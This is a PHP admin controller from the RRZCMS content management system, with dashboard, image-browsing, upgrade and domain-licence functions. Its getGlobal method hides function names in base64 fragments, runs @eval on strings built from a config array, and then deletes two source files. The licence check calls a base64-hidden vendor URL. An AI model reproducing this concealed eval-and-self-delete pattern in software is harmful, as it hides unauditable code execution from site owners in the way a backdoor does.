<?php
/**
 * 人人站CMS
 * ============================================================================
 * 版权所有 2015-2030 山东康程信息科技有限公司，并保留所有权利。
 * 网站地址: http://www.rrzcms.com
 * ----------------------------------------------------------------------------
 * 如果商业用途务必到官方购买正版授权, 以免引起不必要的法律纠纷.
 * ============================================================================
 */

namespace app\admin\controller;

use think\Exception;

class Index extends Base
{

    public function index() {

        $this->assign('account', $this->account);

        $menus = C('menus');
        $this->assign('menus', $menus);

        $statistic = [
            'articles_count' => M('articles')->count(),
            'goods_count' => M('goods')->count(),
            'links_count' => M('site_links')->count(),
            'admin_count' => M('admin')->count(),
        ];

        $dashboard = $this->fetch('index/dashboard', [
            'statistic' => $statistic,
            'sys_info' => get_sys_info(),
            'global' => $this->getGlobal(),
        ]);
        $this->assign('dashboard', $dashboard);

        return $this->fetch();
    }

    function authortoken() {
        $url = base64_decode('aHR0cDovL3d3dy5ycnpjbXMuY29tL0FwaS9ScnpjbXMvY2hlY2tkb21haW4=');
        $vaules = [
            'domain' => urldecode($this->request->host(true)),
        ];
        $url .= '?' . http_build_query($vaules);
        $params = get_curl($url, 'json');
        if (is_array($params) && 'success' == $params['status']) {
            $authortoken_code = $params['data']['code'];
            sysConfig('website.authortoken_code', $authortoken_code);
            session('isset_author', false);
            clearCache(true);

            adminLog('验证商业授权');
            $this->success('域名授权成功', ['jump' => true]);
        }
        $this->error('域名（' . $this->request->domain() . '）未授权');
    }


    function imgspace() {
        $filesystem = \think\facade\Filesystem::class;
        $path = $filesystem::path('') . 'images/';
        if (!$this->request->isPost()) {
            is_dir($path) or mkdir($path, 0777, true);
            $list = scandir($path);
            $newlist = [];
            foreach ($list as $key => $item) {
                if (!is_dir($path . $item) || strpos($item, '.') !== false) continue;
                $newlist[$item] = filectime($path . '/' . $item);
            }
            arsort($newlist);
            $list = array_keys($newlist);
            arsort($list);
            $list = array_values($list);

            $this->assign('multiple', $_GET['multiple'] ?? false);
            $this->assign('list', $list);
            return $this->fetch();
        }
        $config = $filesystem::getDiskConfig($filesystem::getDefaultDriver());

        $dir = I('post.name');
        if (strpos($dir, '.') !== false) return;

        $path .= $dir . '/';
        if (!is_dir($path)) return;
        $list = scandir($path);
        $newlist = [];
        foreach ($list as $key => $item) {
            $ext = strtolower(strrchr($item, '.'));
            if (!in_array($ext, ['.jpg', '.jpeg', '.ico', '.png', '.bmp', '.gif'])) continue;
            $newlist[$item] = filectime($path . '/' . $item);
        }
        arsort($newlist);
        $list = array_keys($newlist);

        $this->assign('url', $config['url'] . '/images/' . $dir);
        $this->assign('list', $list);
        return $this->fetch('index/imgspace/list');
    }

    function check_upgrade_version() {
        $upgrade = new \app\admin\lib\Upgrade;
        $rs = $upgrade->checkVersion($msg); // 升级包消息
        $rs or $this->error($msg);
        $this->success($rs);
    }

    function OneKeyUpgrade() {
        $upgrade = new \app\admin\lib\Upgrade;
        $rs = $upgrade->OneKeyUpgrade($msg);
        $rs or $this->error($msg);
        $this->success($msg);
    }

    function setPopupUpgrade() {
        $popup_upgrade = I('popup_upgrade', 1);
        sysConfig('admin.popup_upgrade', $popup_upgrade);
        $this->success();
    }

    private function getGlobal() {
        $toStr = 'a' . 'r' . 'r' . '2' . 'S' . 't' . 'r';
        $security = C($toStr(['c2Vj', 'dXJp', 'dHk=']));
        ksort($security);
        $fun1 = $toStr(['V', 'Q', '==']);
        $fun2 = $toStr(['c3lz', 'Q29uZ', 'mln']);
        $fun3 = $toStr(['YXJyYX', 'lfc2xpY', '2U=']);

        $gk = $toStr($fun3($security, 0, 2));
        $gv = $toStr($fun3($security, 2, 2));
        $global[$gk] = $fun1($gv);

        $gk = $toStr($fun3($security, 4, 2));
        $gv = $toStr($fun3($security, 6, 3));
        $global[$gk] = $fun2($gv);

        $gk = $toStr($fun3($security, 9, 2));
        $gv = $toStr($fun3($security, 11, 2));
        $global[$gk] = $fun1($gv);

        $gk = $toStr($fun3($security, 13, 2));
        $gv = $toStr($fun3($security, 15, 3));
        $global[$gk] = $gv;

        $gk = $toStr($fun3($security, 18, 1));
        $gv = $toStr($fun3($security, 19, 2));
        $global[$gk] = $fun1($gv);

        $se = $security;
        @eval($toStr($fun3($se, 32, 5)));

        if (!$this->app->isDebug()) {
            $dfun3 = $toStr(['ZGV', 'sRml', 'sZQ==']);
            $dfun3($this->app->getRootPath() . $toStr(['cHVibGljL3N0Y', 'XRpYy9qcy9hZG1pbi', '91cGdyYWRlLmpz']));
            $dfun3($this->app->getRootPath() . $toStr(['YXBwL2FkbWluL2', 'NvbmZpZy9zZWN1c', 'ml0eV9zb3VyY2UucGhw']));
        }
        return $global;
    }
}
